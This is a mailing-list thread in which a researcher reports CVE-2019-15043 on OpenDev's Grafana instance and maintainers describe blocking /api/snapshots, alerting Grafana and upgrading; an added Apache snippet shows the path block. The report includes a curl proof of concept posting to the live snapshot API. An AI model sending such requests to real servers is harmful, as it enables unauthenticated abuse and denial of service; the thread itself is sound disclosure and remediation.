Critical Vulnerability Report
HEY SECURITY TEAM,

I'm a security researcher. I have found a critical vulnerability at one of your domains, CVE-2019-15043, which can lead to a DDoS attack and can make the system go down via the Grafana snapshot instance.

Vuln url: https://grafana.opendev.org/api/snapshots <https://grafana.quiknode.io/api/snapshots>

POC:

    root@kali:/home/kali# curl -s -XPOST https://grafana.opendev.org/api/snapshots -H "Accept: application/json" -H "Content-Type: application/json" -d '{"dashboard": {}}' | json_pp
    {
       "deleteKey" : "6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
       "deleteUrl" : "http://localhost:3000/api/snapshots-delete/6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
       "key" : "91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO",
       "url" : "http://localhost:3000/dashboard/snapshot/91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO"
    }

for more reference - https://aaron-hoffmann.com/blog/cve-2019-15043/

Fix it to the latest Grafana instance.

Best Regards,
Divya Singh - @Dgirlwhohacks
On Sun, Feb 14, 2021 at 05:47:08PM +0000, Divya Singh wrote:
I have found a critical vulnerability at one of your domains, CVE-2019-15043, which can lead to a DDoS attack and can make the system go down via the Grafana snapshot instance
Thank you for your report and we will deal with this.

For future reference, security issues can be reported via the service-incident@opendev.org address. You certainly could not be expected to know this as we have not done a good job at making this clear. I have proposed [1] to hopefully make this more obvious on the main system-config documentation page. If there was anywhere else you looked for disclosure addresses without success please let us know, and we can work to update that too.

-i

[1] https://review.opendev.org/c/opendev/system-config/+/775554
Any update on this?

Best regards
Dgirlwhohacks

On Tue, 16 Feb, 2021, 3:00 am Ian Wienand, <iwienand@redhat.com> wrote:
On Mon, Feb 15, 2021 at 03:35:05PM +1100, Ian Wienand wrote:
For future reference, security issues can be reported via the service-incident@opendev.org address.
Sorry, my typo: that should be service-incident@lists.opendev.org (note the lists :)
-i
On 2021-02-28 17:03:13 +0530 (+0530), Divya Singh wrote:
Any update on this? [...]
Thanks for the reminder, subsequent discussion ended up happening in IRC and we neglected to follow up to this mailing list thread.

Roughly 22 hours after you contacted this discussion list (some of the delay was waiting on list moderators like me to approve the message), we merged https://review.opendev.org/775548 to block access to any paths starting with "/api/snapshots" after confirming that the latest Grafana release was still vulnerable for sites like ours configured with anonymous access. At the same time, we also reached out to the Grafana maintainers privately via encrypted E-mail to let them know about this alternative avenue to the vulnerability.

A couple of days later they pushed and merged https://github.com/grafana/grafana/pull/31263 to correct it, cherry-picking a backport of it to the v7.4.x series in https://github.com/grafana/grafana/pull/31266 and immediately releasing that as v7.4.2. The next day we merged https://review.opendev.org/776553 to upgrade our deployment to the new fixed version, but kept access to /api/snapshots blocked as we treat the service as a read-only interface anyway (configured and managed exclusively through automated orchestration tools driven by code-reviewed Git commits).

Thanks again for bringing this to our attention!
-- 
Jeremy Stanley
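The message above describes the interim mitigation OpenDev applied: deny every request path starting with /api/snapshots at the web server in front of Grafana, independent of which Grafana version is running behind it. The following is an added example and not OpenDev's system-config change (the thread does not say which web server OpenDev uses); it assumes an Apache httpd 2.4 reverse proxy in front of Grafana, and the ServerName and backend address are placeholders.

```apache
# Added example (not OpenDev's system-config): deny the Grafana snapshot API
# at an Apache httpd 2.4 reverse proxy. Hostname, backend port and the
# single-vhost layout are assumptions, not values taken from the thread.
<VirtualHost *:443>
    ServerName grafana.example.org

    # Deny anything whose path starts with /api/snapshots before it is
    # proxied. <Location> is a prefix match on the normalised request path,
    # so this covers /api/snapshots, /api/snapshots/ and
    # /api/snapshots-delete/<key> alike. Authorization runs before the
    # proxy handler, so Grafana never sees these requests.
    <Location "/api/snapshots">
        Require all denied
    </Location>

    # Everything else is forwarded to the Grafana instance as before.
    ProxyPreserveHost On
    ProxyPass        / http://127.0.0.1:3000/
    ProxyPassReverse / http://127.0.0.1:3000/
</VirtualHost>
```

After reloading httpd, a POST to /api/snapshots on your own deployment should be answered with a 403 by Apache rather than the JSON body shown in the report, and the deleteUrl path returned by Grafana is covered by the same prefix rule. The block only protects what the proxy sees; the Grafana upgrade to the fixed release described in the message is still the actual fix.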
Hey thanks for the response, can I get any kind of token of appreciation for my work if possible?

Best,
Dgirlwhohacks

On Sun, 28 Feb, 2021, 9:16 pm Jeremy Stanley, <fungi@yuggoth.org> wrote:
On 2021-02-28 17:03:13 +0530 (+0530), Divya Singh wrote:
Any update on this? [...]
Thanks for the reminder, subsequent discussion ended up happening in IRC and we neglected to follow up to this mailing list thread.
Roughly 22 hours after you contacted this discussion list (some of the delay was waiting on list moderators like me to approve the message), we merged https://review.opendev.org/775548 to block access to any paths starting with "/api/snapshots" after confirming that the latest Grafana release was still vulnerable for sites like ours configured with anonymous access. At the same time, we also reached out to the Grafana maintainers privately via encrypted E-mail to let them know about this alternative avenue to the vulnerability.
A couple of days later they pushed and merged https://github.com/grafana/grafana/pull/31263 to correct it, cherry-picking a backport of it to the v7.4.x series in https://github.com/grafana/grafana/pull/31266 and immediately releasing that as v7.4.2. The next day we merged https://review.opendev.org/776553 to upgrade our deployment to the new fixed version, but kept access to /api/snapshots blocked as we treat the service as a read-only interface anyway (configured and managed exclusively through automated orchestration tools driven by code-reviewed Git commits).
Thanks again for bringing this to our attention!
-- 
Jeremy Stanley
On 2021-02-28 21:35:24 +0530 (+0530), Divya Singh wrote:
Hey thanks for the response, can I get any kind of token of appreciation for my work if possible? [...]
The OpenDev Collaboratory is a volunteer collective operating services on donated resources for the benefit of the broader free/libre open source software community. Aside from publicly thanking you for letting us know about a problem with one of these services (which I've done here on this mailing list), I'm not sure what more we have to offer.
-- 
Jeremy Stanley
Agreed! & Very much appreciated

Best,
Dgirlwhohacks

On Sun, 28 Feb, 2021, 9:55 pm Jeremy Stanley, <fungi@yuggoth.org> wrote:
On 2021-02-28 21:35:24 +0530 (+0530), Divya Singh wrote:
Hey thanks for the response, can I get any kind of token of appreciation for my work if possible? [...]
The OpenDev Collaboratory is a volunteer collective operating services on donated resources for the benefit of the broader free/libre open source software community. Aside from publicly thanking you for letting us know about a problem with one of these services (which I've done here on this mailing list), I'm not sure what more we have to offer.
-- 
Jeremy Stanley